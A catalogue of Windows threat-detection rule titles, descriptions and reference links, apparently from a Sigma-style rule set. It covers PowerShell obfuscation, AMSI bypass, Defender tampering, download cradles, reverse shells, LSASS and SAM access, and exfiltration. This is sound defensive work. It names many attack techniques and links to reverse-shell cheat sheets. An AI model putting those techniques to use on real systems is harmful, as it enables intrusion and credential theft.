PDQ Deploy Remote Administration Tool Execution Detects use of the PDQ Deploy remote admin tool https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md, https://www.pdq.com/pdq-deploy/
Potentially Suspicious Execution Of PDQDeployRunner Detects suspicious execution of "PDQDeployRunner", which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines https://twitter.com/malmoeb/status/1550483085472432128
Perl Inline Command Execution Detects execution of perl using the "-e"/"-E" flags. This could be used as a way to launch a reverse shell or execute live perl code. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Php Inline Command Execution Detects execution of php using the "-r" flag. This could be used as a way to launch a reverse shell or execute live php code. https://www.php.net/manual/en/features.commandline.php, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Ping Hex IP Detects a ping command that uses a hex encoded IP address https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna, https://twitter.com/vysecurity/status/977198418354491392
PktMon.EXE Execution Detects execution of PktMon, a tool that captures network packets. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Suspicious Plink Port Forwarding Detects suspicious Plink tunnel port forwarding to a local port https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/, https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
Potential RDP Tunneling Via Plink Detects execution of plink to perform data exfiltration and tunneling https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
Suspicious Powercfg Execution To Change Lock Screen Timeout Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options
AADInternals PowerShell Cmdlets Execution - ProcessCreation Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365. https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals
Potential Active Directory Enumeration Using AD Module - ProcCreation Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Add Windows Capability Via PowerShell Cmdlet Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
Potential AMSI Bypass Via .NET Reflection Detects requests to "amsiInitFailed" that can be used to disable AMSI scanning https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Potential AMSI Bypass Using NULL Bits Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
Audio Capture via PowerShell Detects audio capture via PowerShell Cmdlet. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html, https://github.com/frgnca/AudioDeviceCmdlets
Suspicious Encoded PowerShell Command Line Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
Suspicious PowerShell Encoded Command Patterns Detects PowerShell command line patterns in combination with encoded commands that often appear in malware infection chains https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
Suspicious Obfuscated PowerShell Code Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/
PowerShell Base64 Encoded FromBase64String Cmdlet Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line Internal Research
Malicious Base64 Encoded PowerShell Keywords in Command Lines Detects base64 encoded strings used in hidden malicious PowerShell command lines http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
PowerShell Base64 Encoded IEX Cmdlet Detects usage of a base64 encoded "IEX" cmdlet in a process command line Internal Research
PowerShell Base64 Encoded Invoke Keyword Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Powershell Base64 Encoded MpPreference Cmdlet Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modify or tamper with Windows Defender AV https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403
PowerShell Base64 Encoded Reflective Assembly Load Detects base64 encoded .NET reflective loading of Assembly https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0
Potential Process Execution Proxy Via CL_Invocation.ps1 Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
PowerShell Base64 Encoded WMI Classes Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
Assembly Loading Via CL_LoadAssembly.ps1 Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls. https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/, https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/
Potential PowerShell Obfuscation Via Reversed Commands Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66
ConvertTo-SecureString Cmdlet Usage Via CommandLine Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples
Potential PowerShell Command Line Obfuscation Detects the PowerShell command lines with special characters https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64
Computer Discovery And Export Via Get-ADComputer Cmdlet Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
New Service Creation Using PowerShell Detects the creation of a new service using powershell. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Gzip Archive Decode Via PowerShell Detects attempts of decoding encoded Gzip archives via PowerShell. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Execution With Potential Decryption Capabilities Detects PowerShell commands that decrypt an ".LNK" file to drop the next stage of the malware. https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Powershell Defender Disable Scan Feature Detects requests to disable Microsoft Defender features using PowerShell commands https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE, https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
Powershell Defender Exclusion Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403
Disable Windows Defender AV Security Monitoring Detects attackers attempting to disable Windows Defender using Powershell https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/, https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Windows Firewall Disabled via PowerShell Detects attempts to disable the Windows Firewall using PowerShell https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html
Potential PowerShell Downgrade Attack Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-
Disabled IE Security Features Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
Potential COM Objects Download Cradles Usage - Process Creation Detects usage of COM objects that can be abused to download files in PowerShell by CLSID https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
PowerShell Web Download Detects suspicious ways to download files or content using PowerShell https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
Obfuscated PowerShell OneLiner Execution Detects the execution of a specific OneLiner to download and execute powershell modules in memory. https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
Potential DLL File Download Via PowerShell Invoke-WebRequest Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Download and Execution Cradles Detects PowerShell download and execution cradles. https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd, https://labs.withsecure.com/publications/fin7-target-veeam-servers
PowerShell Download Pattern Detects a Powershell process that contains download commands in its command line string https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html, https://lab52.io/blog/winter-vivern-all-summer/, https://hatching.io/blog/powershell-analysis/
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
DSInternals Suspicious PowerShell Cmdlets Detects execution and usage of the DSInternals PowerShell module, which can be used to perform what might be considered suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
Email Exfiltration Via Powershell Detects email exfiltration via powershell cmdlets https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml
Potential Suspicious Windows Feature Enabled - ProcCreation Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server
Suspicious Execution of Powershell with Base64 Detects a command line that launches powershell with a base64 payload https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets, https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/, https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
Potential Encoded PowerShell Patterns In CommandLine Detects specific combinations of encoding methods in PowerShell via the commandline https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
Powershell Inline Execution From A File Detects inline execution of PowerShell code from a file https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
Certificate Exported Via PowerShell Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Base64 Encoded PowerShell Command Detected Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Suspicious FromBase64String Usage On Gzip Archive - Process Creation Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
PowerShell Get-Process LSASS Detects a "Get-Process" cmdlet and its aliases on the lsass process, which is in almost all cases a sign of malicious activity https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
PowerShell Get-Clipboard Cmdlet Via CLI Detects usage of the 'Get-Clipboard' cmdlet via CLI https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
Abuse of Service Permissions to Hide Services Via Set-Service Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
Suspicious PowerShell IEX Execution Patterns Detects suspicious ways to run Invoke-Expression using the IEX alias https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Root Certificate Installed From Susp Locations Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://learn.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps
Import PowerShell Modules From Suspicious Directories - ProcCreation Detects powershell scripts that import modules from suspicious directories https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md
Unsigned AppX Installation Attempt Using Add-AppxPackage Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package, https://twitter.com/WindowsDocs/status/1620078135080325122
Suspicious PowerShell Invocations - Specific - ProcessCreation Detects suspicious PowerShell invocation command parameters Internal Research
Suspicious Invoke-WebRequest Execution With DirectIP Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
Suspicious Invoke-WebRequest Execution Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is located in a suspicious location https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
Suspicious PowerShell Mailbox Export to Share Detects usage of the PowerShell New-MailboxExportRequest cmdlet to export a mailbox to a remote or local share, as used in ProxyShell exploitations https://youtu.be/5mqid-7zp8k?t=2481, https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html, https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1, https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
Malicious PowerShell Commandlets - ProcessCreation Detects Commandlet names from well-known PowerShell exploitation frameworks https://adsecurity.org/?p=2921, https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries, https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1, https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1, https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1, https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1, https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/, https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/, https://github.com/calebstewart/CVE-2021-1675, https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html, https://github.com/HarmJ0y/DAMP, https://github.com/samratashok/nishang, https://github.com/DarkCoderSc/PowerRunAsSystem/, https://github.com/besimorhino/powercat, https://github.com/Kevin-Robertson/Powermad, https://github.com/adrecon/ADRecon, https://github.com/adrecon/AzureADRecon
MSExchange Transport Agent Installation Detects the installation of an Exchange Transport Agent https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7
Non Interactive PowerShell Process Spawned Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html
Potential PowerShell Obfuscation Via WCHAR Detects suspicious encoded character syntax often used for defense evasion https://twitter.com/0gtweet/status/1281103918693482496
Execution of Powershell Script in Public Folder This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder https://www.mandiant.com/resources/evolution-of-fin7
Tamper Windows Defender Remove-MpPreference Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Potential Powershell ReverseShell Connection Detects usage of the "TcpClient" class, which can be abused to establish remote connections and reverse shells, as used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and others. https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Shells/Invoke-PowerShellTcpOneLine.ps1
Run PowerShell Script from ADS Detects PowerShell script execution from Alternate Data Stream (ADS) https://github.com/p0shkatz/Get-ADS/blob/1c3a3562e713c254edce1995a7d9879c687c7473/Get-ADS.ps1
Run PowerShell Script from Redirected Input Stream Detects PowerShell script execution via input stream redirect https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml, https://twitter.com/Moriarty_Meng/status/984380793383370752
PowerShell SAM Copy Detects suspicious PowerShell scripts accessing SAM hives https://twitter.com/splinter_code/status/1420546784250769408
Suspicious Service DACL Modification Via Set-Service Cmdlet Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (only available with PowerShell 7) that can be used to hide services or make them unstoppable https://www.sans.org/blog/red-team-tactics-hiding-windows-services/, https://learn.microsoft.com/pt-br/windows/win32/secauthz/sid-strings
Suspicious PowerShell Invocation From Script Engines Detects suspicious powershell invocations from interpreters or unusual programs https://www.securitynewspaper.com/2017/03/20/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/
PowerShell Set-Acl On Windows Folder Detects PowerShell scripts to set the ACL to a file in the Windows folder https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Change PowerShell Policies to an Insecure Level Detects changing the PowerShell script execution policy to a potentially insecure level using the "-ExecutionPolicy" flag. https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4, https://adsecurity.org/?p=2604, https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/
PowerShell Script Change Permission Via Set-Acl Detects PowerShell execution to set the ACL of a file or a folder https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1, https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md
Service StartupType Change Via PowerShell Set-Service Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual" https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955
Deletion of Volume Shadow Copies via WMI with PowerShell Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell, https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html
Exchange PowerShell Snap-Ins Usage Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://www.intrinsec.com/apt27-analysis/
Stop Windows Service Via PowerShell Stop-Service Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service" https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4
Suspicious PowerShell Download and Execute Pattern Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive) https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
Suspicious PowerShell Parameter Substring Detects suspicious PowerShell invocation with a parameter substring http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
Suspicious PowerShell Parent Process Detects suspicious or uncommon parent processes of PowerShell https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26
PowerShell Script Run in AppData Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder https://twitter.com/JohnLaTwC/status/1082851155481288706, https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
Powershell Token Obfuscation - Process Creation Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation
PowerShell DownloadFile Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
User Discovery And Export Via Get-ADUser Cmdlet Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Net WebClient Casing Anomalies Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
Suspicious X509Enrollment - Process Creation Detects use of X509Enrollment https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41, https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115
Suspicious XOR Encoded PowerShell Command Detects presence of a potentially xor encoded powershell command https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://redcanary.com/blog/yellow-cockatoo/, https://zero2auto.com/2020/05/19/netwalker-re/, https://mez0.cc/posts/cobaltstrike-powershell-exec/
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Arbitrary File Download Via PresentationHost.EXE Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/239/files
XBAP Execution From Uncommon Locations Via PresentationHost.EXE Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files and bypass AWL https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/
Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5
Abusing Print Executable Attackers can use print.exe for remote file copy https://lolbas-project.github.io/lolbas/Binaries/Print/, https://twitter.com/Oddvarmoe/status/985518877076541440
